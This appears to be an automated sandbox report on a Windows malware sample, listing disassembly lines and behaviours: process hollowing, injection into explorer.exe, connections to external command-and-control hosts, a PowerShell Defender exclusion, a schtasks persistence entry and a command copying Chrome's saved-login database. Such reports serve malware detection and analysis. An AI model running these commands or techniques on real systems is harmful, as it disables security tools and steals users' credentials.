Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A830 mov eax, dword ptr fs:[00000030h] 21_2_0460A830
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h] 21_2_04667016
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h] 21_2_04667016
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04667016 mov eax, dword ptr fs:[00000030h] 21_2_04667016
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h] 21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h] 21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h] 21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FB02A mov eax, dword ptr fs:[00000030h] 21_2_045FB02A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h] 21_2_046B4015
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B4015 mov eax, dword ptr fs:[00000030h] 21_2_046B4015
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h] 21_2_0460B8E4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B8E4 mov eax, dword ptr fs:[00000030h] 21_2_0460B8E4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E58EC mov eax, dword ptr fs:[00000030h] 21_2_045E58EC
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov ecx, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0467B8D0 mov eax, dword ptr fs:[00000030h] 21_2_0467B8D0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h] 21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h] 21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E40E1 mov eax, dword ptr fs:[00000030h] 21_2_045E40E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046120A0 mov eax, dword ptr fs:[00000030h] 21_2_046120A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046290AF mov eax, dword ptr fs:[00000030h] 21_2_046290AF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9080 mov eax, dword ptr fs:[00000030h] 21_2_045E9080
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461F0BF mov ecx, dword ptr fs:[00000030h] 21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h] 21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461F0BF mov eax, dword ptr fs:[00000030h] 21_2_0461F0BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04663884 mov eax, dword ptr fs:[00000030h] 21_2_04663884
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04663884 mov eax, dword ptr fs:[00000030h] 21_2_04663884
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h] 21_2_0460B944
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460B944 mov eax, dword ptr fs:[00000030h] 21_2_0460B944
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h] 21_2_045EB171
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB171 mov eax, dword ptr fs:[00000030h] 21_2_045EB171
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EC962 mov eax, dword ptr fs:[00000030h] 21_2_045EC962
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov eax, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04604120 mov ecx, dword ptr fs:[00000030h] 21_2_04604120
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461513A mov eax, dword ptr fs:[00000030h] 21_2_0461513A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461513A mov eax, dword ptr fs:[00000030h] 21_2_0461513A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h] 21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h] 21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9100 mov eax, dword ptr fs:[00000030h] 21_2_045E9100
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046741E8 mov eax, dword ptr fs:[00000030h] 21_2_046741E8
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h] 21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h] 21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EB1E1 mov eax, dword ptr fs:[00000030h] 21_2_045EB1E1
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046669A6 mov eax, dword ptr fs:[00000030h] 21_2_046669A6
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h] 21_2_046161A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046161A0 mov eax, dword ptr fs:[00000030h] 21_2_046161A0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h] 21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h] 21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h] 21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A49A4 mov eax, dword ptr fs:[00000030h] 21_2_046A49A4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h] 21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h] 21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h] 21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046651BE mov eax, dword ptr fs:[00000030h] 21_2_046651BE
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov ecx, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046099BF mov eax, dword ptr fs:[00000030h] 21_2_046099BF
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460C182 mov eax, dword ptr fs:[00000030h] 21_2_0460C182
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461A185 mov eax, dword ptr fs:[00000030h] 21_2_0461A185
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612990 mov eax, dword ptr fs:[00000030h] 21_2_04612990
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h] 21_2_0469B260
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469B260 mov eax, dword ptr fs:[00000030h] 21_2_0469B260
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8A62 mov eax, dword ptr fs:[00000030h] 21_2_046B8A62
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0462927A mov eax, dword ptr fs:[00000030h] 21_2_0462927A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h] 21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h] 21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h] 21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E9240 mov eax, dword ptr fs:[00000030h] 21_2_045E9240
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04674257 mov eax, dword ptr fs:[00000030h] 21_2_04674257
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AEA55 mov eax, dword ptr fs:[00000030h] 21_2_046AEA55
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h] 21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EAA16 mov eax, dword ptr fs:[00000030h] 21_2_045EAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A229 mov eax, dword ptr fs:[00000030h] 21_2_0460A229
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h] 21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04624A2C mov eax, dword ptr fs:[00000030h] 21_2_04624A2C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov ecx, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E5210 mov eax, dword ptr fs:[00000030h] 21_2_045E5210
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F8A0A mov eax, dword ptr fs:[00000030h] 21_2_045F8A0A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04603A1C mov eax, dword ptr fs:[00000030h] 21_2_04603A1C
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h] 21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046AAA16 mov eax, dword ptr fs:[00000030h] 21_2_046AAA16
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612AE4 mov eax, dword ptr fs:[00000030h] 21_2_04612AE4
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612ACB mov eax, dword ptr fs:[00000030h] 21_2_04612ACB
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461FAB0 mov eax, dword ptr fs:[00000030h] 21_2_0461FAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h] 21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045FAAB0 mov eax, dword ptr fs:[00000030h] 21_2_045FAAB0
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h] 21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461D294 mov eax, dword ptr fs:[00000030h] 21_2_0461D294
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045E52A5 mov eax, dword ptr fs:[00000030h] 21_2_045E52A5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EF358 mov eax, dword ptr fs:[00000030h] 21_2_045EF358
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h] 21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04613B7A mov eax, dword ptr fs:[00000030h] 21_2_04613B7A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EDB40 mov eax, dword ptr fs:[00000030h] 21_2_045EDB40
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B8B58 mov eax, dword ptr fs:[00000030h] 21_2_046B8B58
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045EDB60 mov ecx, dword ptr fs:[00000030h] 21_2_045EDB60
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460A309 mov eax, dword ptr fs:[00000030h] 21_2_0460A309
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A131B mov eax, dword ptr fs:[00000030h] 21_2_046A131B
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046103E2 mov eax, dword ptr fs:[00000030h] 21_2_046103E2
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0460DBE9 mov eax, dword ptr fs:[00000030h] 21_2_0460DBE9
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h] 21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046653CA mov eax, dword ptr fs:[00000030h] 21_2_046653CA
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04614BAD mov eax, dword ptr fs:[00000030h] 21_2_04614BAD
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046B5BA5 mov eax, dword ptr fs:[00000030h] 21_2_046B5BA5
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h] 21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_045F1B8F mov eax, dword ptr fs:[00000030h] 21_2_045F1B8F
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_046A138A mov eax, dword ptr fs:[00000030h] 21_2_046A138A
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0469D380 mov ecx, dword ptr fs:[00000030h] 21_2_0469D380
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_0461B390 mov eax, dword ptr fs:[00000030h] 21_2_0461B390
Source: C:\Windows\SysWOW64\control.exe Code function: 21_2_04612397 mov eax, dword ptr fs:[00000030h] 21_2_04612397
Checks if the current process is being debugged
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Code function: 12_2_0040A140 LdrLoadDll, 12_2_0040A140
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 38.34.163.59 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 35.209.127.155 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.properscooter.com
Source: C:\Windows\explorer.exe Domain query: www.jamesreadtanusa.com
Source: C:\Windows\explorer.exe Network Connect: 198.54.116.236 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.uspplongee.com
Source: C:\Windows\explorer.exe Domain query: www.bldh45.xyz
Source: C:\Windows\explorer.exe Network Connect: 5.183.8.183 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.dems-clicks.com
Source: C:\Windows\explorer.exe Domain query: www.kickball.site
Source: C:\Windows\explorer.exe Network Connect: 35.241.47.216 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 198.54.117.216 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section unmapped: C:\Windows\SysWOW64\control.exe base address: DF0000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Section loaded: unknown target: C:\Windows\SysWOW64\control.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Memory written: C:\Users\user\Desktop\iuvRyl9i7D.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Thread register set: target process: 3616 Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Thread register set: target process: 3616 Jump to behavior
Adds a directory exclusion to Windows Defender
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\dDqpEdJEtzi" /XML "C:\Users\user\AppData\Local\Temp\tmp280F.tmp Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Process created: C:\Users\user\Desktop\iuvRyl9i7D.exe C:\Users\user\Desktop\iuvRyl9i7D.exe Jump to behavior
Source: C:\Windows\SysWOW64\control.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000012.00000000.306887660.0000000005610000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.345614636.0000000005E60000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.339387652.00000000005C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000000.322719517.00000000005C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager,
Source: explorer.exe, 00000012.00000000.299535481.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.373339279.0000000000B50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000012.00000000.323354570.0000000000B50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Users\user\Desktop\iuvRyl9i7D.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\iuvRyl9i7D.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
